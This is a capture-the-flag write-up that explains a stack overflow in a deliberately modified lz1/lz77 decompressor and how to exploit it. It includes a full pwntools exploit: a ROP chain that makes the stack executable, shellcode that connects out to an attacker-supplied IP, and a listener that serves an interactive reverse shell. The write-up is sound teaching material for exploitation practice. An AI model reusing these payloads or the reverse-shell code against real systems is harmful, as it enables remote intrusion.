Summer Pwnables: lz1 Solution

TL;DR 🚀

We’re turning a simple compression library into a shell delivery service! This writeup exploits a buffer overflow in lz1/lz77 decompression by crafting malicious compressed data that overflows the stack and chains ROP gadgets for code execution. Ever wondered how a simple file compression tool could hand you the keys to a system? Well, buckle up because we’re about to turn andyherbert’s innocent lz1 compressor into our personal shell delivery service! 🎭

There is a closed issue on GitHub where afl-fuzz discovered inputs that crash the program. While it might be possible to use these crashes to find a bug, here’s the thing: if you take a look at the decompression function and understand how lz1 (also known as lz77) works, spotting the buffer overflow isn’t too difficult.

Here’s how lz1 handles compression: it takes repeated bytes and compressed them into “pointers.” Each pointer encode two thing: position and length.

lz1 works by compressing repeated bytes into “pointers”. These pointers encode 2 things, the position, and length. For example, lets compress the string “ABCABCABC”. lz1 notices “ABC” is repeated (how it exactly does this, check the compression code), and compresses it as ABC<position:3><length:6>. Notice <position:3> doesnt mean index three, but 3 bytes before the current byte, so it points to the the first letter “A”. During decompression, lz1 will start at the position, and repeat length bytes. What previously took 6 bytes can be compressed into 2 bytes.

Let’s test your understanding before we dive into the exploit:

Quiz 1: How does lz1 differentiate normal bytes from pointers?

Quiz 2: Notice how length in a pointer (6 in our example case) can be longer than the already decompressed data (ABC). How does that make sense? Follow the code, and it should be clear how it works.

The above example of ABC<position:3><length:6> is techincally wrong. It will instead be like ABC<position:3><length:5>C. Just lz1 things

The Technical Deep Dive

In the lz1 code, a pointer is a uint16_t value**. You may think, we should just use 8 bits (1 byte) for position and 8 bits (1 byte) for length, but actually, we can set the bit_size for both position and length. You could totally give position 4 bits and length 12 bits if needed - real compression algorithms do exactly this kind of thing. Sometimes, compressing using lz1 with smaller bitsize for position but larger for length or vice versa can improve the compression. For our case, this will actually help us to exploit it. We will later use 7 bits for position and 9 bits for length.

** Its more like uint24_t. position, length, and data. Data is just 1 byte of uncompressed data.

Now that we’ve got lz1 figured out, let’s exploit that bug we mentioned. The original code uses malloc to set up both compressed and uncompressed_text buffers:

uint32_t file_lz77_decompress (char *filename_in, char *filename_out)
{
    .
    .
    .
    compressed_size = fsize(in);
    compressed_text = malloc(compressed_size); // [1] memory for compressed_text
    if(fread(compressed_text, 1, compressed_size, in) != compressed_size)
        return 0;
    fclose(in);

    uncompressed_size = *((uint32_t *) compressed_text);
    uncompressed_text = malloc(uncompressed_size); // [2] memory for uncompressed_text

    if(lz77_decompress(compressed_text, uncompressed_text) != uncompressed_size)
        return 0;
    .
    .
    .
}

Plot twist: Turns out exploiting this in heap memory was a dead end 🚫, so I swapped it for alloca to get stack allocation instead. Sometimes you gotta pivot!

uint32_t lz77_decompress (uint8_t *compressed_text, uint8_t *uncompressed_text)
{
    uint8_t pointer_length_width;
    uint16_t input_pointer, pointer_length, pointer_pos, pointer_length_mask;
    uint32_t compressed_pointer, coding_pos, pointer_offset, uncompressed_size;

    uncompressed_size = *((uint32_t *) compressed_text);
    pointer_length_width = *(compressed_text + 4);
    compressed_pointer = 5;

    pointer_length_mask = pow(2, pointer_length_width) - 1;

    for(coding_pos = 0; coding_pos < uncompressed_size; ++coding_pos) // [1] coding_pos is bounded here
    {
        input_pointer = *((uint16_t *) (compressed_text + compressed_pointer));
        compressed_pointer += 2;
        pointer_pos = input_pointer >> pointer_length_width;
        pointer_length = pointer_pos ? ((input_pointer & pointer_length_mask) + 1) : 0;
        if(pointer_pos)
            for(pointer_offset = coding_pos - pointer_pos; pointer_length > 0; --pointer_length)
                uncompressed_text[coding_pos++] = uncompressed_text[pointer_offset++]; // [2] but unbounded here, so it may be possible to overflow
        *(uncompressed_text + coding_pos) = *(compressed_text + compressed_pointer++);
    }

    return coding_pos;
}

Notice that uncompressed_size is integer value of the first 4 bytes in compressed_text. Since we can control this value, it possible to make it less than the size of length in a pointer. If we do so, its possible to overflow uncompressed_text in [2] in the lz77_decompress function above.

Challenge Checkpoint: This is a perfect spot to pause and try solving it yourself if you haven’t! The pieces are all there…

Memory Layout: Our Battlefield

In the stack, The memory allocations result in the following structure:

┌──────────────────────────────────────┐
│ uncompressed_text [uncompressed_size]│
│        (aligned to 8 bytes)          │
├──────────────────────────────────────┤
│ compressed_text [compressed_size]    │
│        (aligned to 8 bytes)          │
├──────────────────────────────────────┤
│ uncompressed_size (4 bytes)          │
│ compressed_size (4 bytes)            │
│ in FILE (8 bytes)                    │
│ out FILE (8 bytes)                   │
├──────────────────────────────────────┤
│ saved rbp                            │
│ return address                       │
└──────────────────────────────────────┘

None of the variables are reordered because the code was compiled without stack protection. Somehow, we need a pointer value that will overflow both compressed_text, the other variables, and still be a good ROP chain (also notice the code is compiled statically with no PIE, so no leaks are needed and we have lots of gadgets).

With the layout above, it means our payload must atleast be longer than compressed_size, plus a bit more. Since a ROP payload isnt so incredibly compressable 🫤, we need to try to have a short payload. Also, the usable length is sorta inversely correlated to the pointer length we can use. For example, if we use if we use 4 bits for position and 12 bits for length, this means we can overflow a lot, up to 4096 bytes(!) but with only 4 bits for position, we only have 16 bytes for a useful ROP chain, the 4096 byte overflow will just be those 16 bytes repeated over and over which isnt to useful. On the other hand a large position bit size but small length bit size will allow a complex ROP chain, but not enough length to overflow. In the end, I found 7 bits for position and 9 bits for length to be optimal. This allows 128 bytes for our ROP chain, and more than enough to overflow until the return address.

In the end, my payload had a compressed_size of 0xc0, and using length as 511 (or close to it), I am able to overflow the return address with ROP chain of size 0x80, which is just enough to get a reverse shell

Exploit

The ROP chain I used will call _dl_make_stacks_executable to set the stack to rwx. This requires __stack_prot to be 7, but in glibc 2.39 (the version I compiled with), __stack_prot is in read-only area 😂. Theres a trick however, we can just skip the portion where it uses __stack_prot and instead use our own rdx value, which we set to 7. We also need to set rbx to environ, since rsi will be set to [rbx]. The rest of the function will handle mprotecting the stack. Once stack is executable, we can return to a jmp rsp gadget to run some shellcode.

There are some other things to note like stack alignment, opening a reverse shell, but I leave it up to the reader to discover how some of that stuff is fixed.

exploit.py:

#!/usr/bin/env python3

from pwn import *
import codecs
import warnings

context.arch = 'amd64'

ret = 0x00000000004018da
pop_rdi_rbp = 0x000000000040dfa1
dl_make_stack_exec = 0x4647d0
environ = 0x4b58d0
jmp_rsp = 0x00000000004441d6
pop_rax = 0x00000000004027c5
pop_rcx = 0x000000000040266b
pop_rbx = 0x000000000046da97
pop_rsi_rbp = 0x000000000040d402
mov_dword_rax_7_ecx = 0x00000000004542e0
xchg_edx_eax_xor_eax_eax = 0x000000000040479d
add_edx_eax_pop_rbx = 0x000000000046da92
dl_make_stack_exec_gadget = 0x00000000004647ef
pop_rdx = 0x0000000000453095
stack_prot = 0x4ad450

rop_payload = p64(0x2000)*2 + p64(xchg_edx_eax_xor_eax_eax) + p64(pop_rax) + p64(7) + p64(add_edx_eax_pop_rbx) + p64(environ) + p64(dl_make_stack_exec_gadget) + p64(ret)*5 + p64(jmp_rsp) + asm('''jmp $-0x2a0''')
#assert len(rop_payload) <= 0x50, "too long"
sc = asm('''
    push SYS_socket
    pop rax
    push AF_INET
    pop rdi
    push SOCK_STREAM
    pop rsi
    cdq
    syscall

    mov rdi, rax
    mov rax, 18446744071832535042 ; ip here, change the ffffffff to a valid ip
    push rax

    push SYS_connect
    pop rax
    push 0x10
    pop rdx
    mov rsi, rsp
    syscall
    mov rdx, 0x1000
    sub rsi, 0x280
    syscall
''')

assert len(sc) <= 0x3c
sc = sc.rjust(0x3c, b'\x90')
rop_payload += p64(pop_rsi_rbp)

print(hex(len(sc + rop_payload)))

with open('rop_payload', 'wb') as f:
    f.write(sc + rop_payload)

subprocess.check_call(["./lz1", "c", "9", "rop_payload", "rop_payload.lz77"], stdin=None, stdout=None, stderr=None)

# stage 2

payload = open("rop_payload.lz77", "rb").read()

payload = p32(0xf0) + p8(9) + payload[5:]
payload += b'\xf6\xfb\x00'
payload = payload.ljust(0xd0, b'\x90')
open("payload-exp", "wb").write(payload)

listen.py (this will trigger a reverse shell):

#!/usr/bin/env python3

from pwn import *

context.arch = 'amd64'

l = listen(8080, "0.0.0.0")

l.wait_for_connection()

sc = shellcraft.dup2('rdi', 0)
sc += shellcraft.dup2('rdi', 1)
sc += shellcraft.dup2('rdi', 2)
sc += shellcraft.sh()
sc = b'\x90'*0x100 + asm(sc)

l.sendline(sc)

l.interactive()

Answer to Quiz 1: Plot twist! Technically lz1 encodes normal bytes as pointers too. So “ABC” will ve compressed as <position:0><length:0>A<position:0><length:0>B<position:0><length:0>C. Kinda silly, right? 🤷‍♂️

Answer to Quiz 2: Here’s the mind-bender! In ABC<position:3><length:6>, during decompression, it decompressed per byte. After 3 bytes are decompressed,it is similar to ABCABC<position:3><length:3>, then it becomes ABCABCABC! It’s a bit hard to wrap your head around the first time. 🤯📝

Sources and links

Original code: https://github.com/andyherbert/lz1
Good youtube video about lz77: https://www.youtube.com/watch?v=goOa3DGezUA

Writeup by students

by Lam Jun Rong: https://jro.sg/CTFs/STAR%20Labs%20Summer%20Pwnables/LZ1.html
by Lucas Tan: https://samuzora.com/posts/starlabs-summer-pwn-2025#challenge-001

TL;DR 🚀#

The Technical Deep Dive#

Memory Layout: Our Battlefield#

Exploit#

Sources and links#

Writeup by students#